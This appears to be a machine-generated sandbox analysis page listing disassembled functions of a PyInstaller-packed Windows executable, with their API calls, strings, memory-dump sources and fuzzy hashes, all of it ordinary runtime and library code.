Instruction ID: ea6164a33f99ea05d5061345a38fa5467f57571141975a36f91b6de440f74145
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 28314A72A1AA8289FB20EF71E8552F9B360FF89788F84017DEA4D47A49DF3CD1458710

Function 00007FF79A312B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF79A31918F,?,00007FF79A313C55), ref: 00007FF79A312BA0
MessageBoxW.USER32 ref: 00007FF79A312C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF79A312BA8
Warning, xrefs: 00007FF79A312C1D
WARNING, xrefs: 00007FF79A312BAF

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 2f389f5a7695937ff2bc29169c8e6a2f334d5f5fcfb6527f915c45107f6b20f4
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: F021D122B09B4192F720EB65F8847EAB3A4FB88784F80013EEE8D57659DE3CD645C710

Function 00007FF79A312710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF79A311B99), ref: 00007FF79A312760

Strings

[PYI-%d:%s] , xrefs: 00007FF79A312768
ERROR, xrefs: 00007FF79A31276F
Error [ANSI Fallback], xrefs: 00007FF79A3127CF
Error, xrefs: 00007FF79A3127DE

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: fddc892f905377e5c9ac2dbfed2311a6bed1831833bf9a42d32a1ffeb0a4a2a2
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: CB218E72A1AB8182F670EB61B8817E6B3A4FB88384F80017DFE8C47659DF7CD6458750

Function 00007FF79A329AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF79A329B1D
GetProcAddress.KERNEL32 ref: 00007FF79A329B33
FreeLibrary.KERNEL32 ref: 00007FF79A329B5A

Strings

CorExitProcess, xrefs: 00007FF79A329B2C
mscoree.dll, xrefs: 00007FF79A329B14

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 2e20c439f850b9cc883e699072db82c390d648411c02f8f99ca6c56cfe179dbd
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 7BF04F21E0A60682FA60AB34A899379B360AF45761FD406BDDA6E461E4DF2CD444C320

Function 00007FF79A3393D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF79A339400
_set_statfp.LIBCMT ref: 00007FF79A33941B
_set_statfp.LIBCMT ref: 00007FF79A339437
_set_statfp.LIBCMT ref: 00007FF79A339473

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: a43e02ceae4b777d456a7e579573dbd10ea9977e3b6ba35cc75c43da69c8ccd4
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A2118262E5DA13A1FA74B134D477376B0446F59364EC40ABCEAAE062D6CE2C69414264

Function 00007FF79A32B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B41F
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B43E
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B466
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B477
FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B488

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: 1d2b2f241a8a0fadcbeede62a05a77b5e099780154514e6828fdbbb9954bb4c3
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: 44113020F0F64281FA78B73599961B9F2815F447B0FD887BCDD3D466D6DE2CB8418220

Function 00007FF79A32B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF79A32B2A5
FlsSetValue.KERNEL32 ref: 00007FF79A32B2C4
FlsSetValue.KERNEL32 ref: 00007FF79A32B2EC
FlsSetValue.KERNEL32 ref: 00007FF79A32B2FD
FlsSetValue.KERNEL32 ref: 00007FF79A32B30E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: de96ef790fffefeebc44034530ff6d9624b7c9bfa265193ce7353a4a1a40ef70
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: 58111820E1B20742F978BA7158156BAF2818F45324FD887BCED3E4A2D2DD2CB8014231

Function 00007FF79A326010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32622C

Strings

verbose, xrefs: 00007FF79A326020

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 8d0d28bd5b0e1e05dda1f02d465027fe5ca449077f58f0131e85165420268c35
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9291AB22A0AB4681F771AE35E45037DB6A1EF40B94F84817EDE4A423C6DF3CF8058361

Function 00007FF79A32FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32FF17

Part of subcall function 00007FF79A327AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A327AC9

Strings

UTF-8, xrefs: 00007FF79A32FE96
UTF-16LEUNICODE, xrefs: 00007FF79A32FEB5
ccs, xrefs: 00007FF79A32FE52

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 233d0ad5b0d599eb083509346c113782ae44eb483ce3b5d5adadfb5687adf87f
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 9981D032E0E24386F7757F39C110278B7A0AB11B48FD580BDDE099729ADB2DE921D761

Function 00007FF79A31D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF79A31D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF79A31D77A
RtlUnwindEx.KERNEL32 ref: 00007FF79A31D7D4

Strings

csm, xrefs: 00007FF79A31D761

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: a2f8247e661a3252d4eba9d4ae56190789f1f1c995bc78842721e4931de32f4e
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 1E519032B1A6028AFB24EF25E444A78B791EB45BD8F90817CDA4E47788DF7CE841C710

Function 00007FF79A31F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF79A31F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF79A31F408

Strings

csm, xrefs: 00007FF79A31F45A
csm, xrefs: 00007FF79A31F342

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 2e01b78d3edcd89a96c3a41701cc8073a2d866be18c88203a4e20881a21ce714
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: B351AE32A0928286FB74EE319544278B7A0EB54B88F94827EEA8D47795CF3CF451C710

Function 00007FF79A31EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF79A31EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF79A31EFF3

Strings

MOC, xrefs: 00007FF79A31EFBB
RCC, xrefs: 00007FF79A31EFC3

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 9dbb84cbd7fe5899863eaf9d411033c2d980f4a947e9828f094150f78da7c031
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 4B617032909B8586E770EB25E4413AAF7A0FB85784F44427AEB9D07B95DF7CE190CB10

Function 00007FF79A317E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF79A31352C,?,00000000,00007FF79A313F23), ref: 00007FF79A317F22

Strings

\, xrefs: 00007FF79A317E87
%.*s, xrefs: 00007FF79A317EDB
%s%c, xrefs: 00007FF79A317E94

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: f0f94f65abb296293535af719a6d8c2703c709ee808a3900b946d0e521de170b
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 8831A52171EAC145FA31EB31A8507EAB354EB84BE4F84027DEA6D477C9DF2CD6458B10

Function 00007FF79A312810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF79A312868
ERROR, xrefs: 00007FF79A31286F
Error, xrefs: 00007FF79A3128DD

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: e74d699b85bd072155c6ab6c3068ce818dbb823c0799ebde9350cc438ab1150d
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 91219F62B09B4192F660EB65B8847EAB3A4EB88784F80013EEE8D57659DF3CD645C710

Function 00007FF79A32C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF79A32C68F
WriteFile.KERNEL32 ref: 00007FF79A32C957
WriteFile.KERNEL32 ref: 00007FF79A32C99D
GetLastError.KERNEL32 ref: 00007FF79A32CA53

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 6f13d7355a447b337cb2b16aa368540a50fe4dc5cc010ef18627a4f7018a9e19
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: D0D1E172B1AA818AF720DF75D4402ACB7B1FB44798B84826EDE5D97B89DE38D006C350

Function 00007FF79A32F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A32FAEC
_get_daylight.LIBCMT ref: 00007FF79A32FAFD
_get_daylight.LIBCMT ref: 00007FF79A32FB0E
_isindst.LIBCMT ref: 00007FF79A32FBD9

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 3792dfb13cff3f18d9881d019c0e66cdf3257075df389e5363ed49343d3db61d
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 3051E372F0A1118BFB38EF3499516BCB7A1AB4435CFD1427DDE1E92AE5DB38A4118610

Function 00007FF79A3257EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF79A32581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF79A325881
GetLastError.KERNEL32 ref: 00007FF79A325912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A325724), ref: 00007FF79A32595E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: e89e7d9330ac4f7a19c0994c40f32e66db41e33101acb9eb9cc5a0035b14d378
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: BC519E22E0A6418AFB20EF71D4503BDB3A5AB48B58F94847DEE4D97A89DF3CD5418720

Function 00007FF79A3120C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF79A3120F4
SetWindowLongPtrW.USER32 ref: 00007FF79A312116
GetWindowLongPtrW.USER32 ref: 00007FF79A312140
InvalidateRect.USER32 ref: 00007FF79A312160

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 341753ab018fe6a76de596b9a199baeba66350a323dafa424fae5e7309806819
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
